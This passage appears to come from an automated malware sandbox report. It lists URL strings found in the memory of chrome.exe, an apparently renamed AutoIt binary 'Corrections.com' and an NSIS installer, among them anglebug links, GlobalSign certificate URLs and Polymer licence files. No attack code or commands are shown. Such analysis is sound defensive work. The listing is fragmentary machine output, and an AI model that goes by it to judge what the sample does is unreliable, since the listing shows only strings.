            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
            Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
            Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
            Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
            Source: Corrections.com.1.dr, Colonial.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
            Source: Corrections.com.1.dr, Colonial.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: Corrections.com.1.dr, Colonial.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
            Source: Corrections.com.1.dr, Colonial.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: Corrections.com.1.dr, Colonial.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
            Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
            Source: chrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
            Source: lem.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Corrections.com.1.dr, Colonial.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
            Source: Corrections.com.1.dr, Colonial.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: Corrections.com.1.dr, Colonial.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: Corrections.com.1.dr, Colonial.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
            Source: chrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126437560.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126685947.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126581456.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126505449.0000413000724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125027206.000041300108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
            Source: chrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126437560.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126685947.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126581456.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126505449.0000413000724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125027206.000041300108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
            Source: chrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126437560.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126685947.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126581456.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126505449.0000413000724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125027206.000041300108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
            Source: chrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126437560.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126685947.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126581456.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126505449.0000413000724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125027206.000041300108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
            Source: Corrections.com.1.dr, Colonial.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: Corrections.com.1.dr, Colonial.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
            Source: Corrections.com, 0000000A.00000000.1730066094.00000000009F5000.00000002.00000001.01000000.00000007.sdmp, Corrections.com.1.dr, Appeals.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
            Source: Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
            Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
            Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
            Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
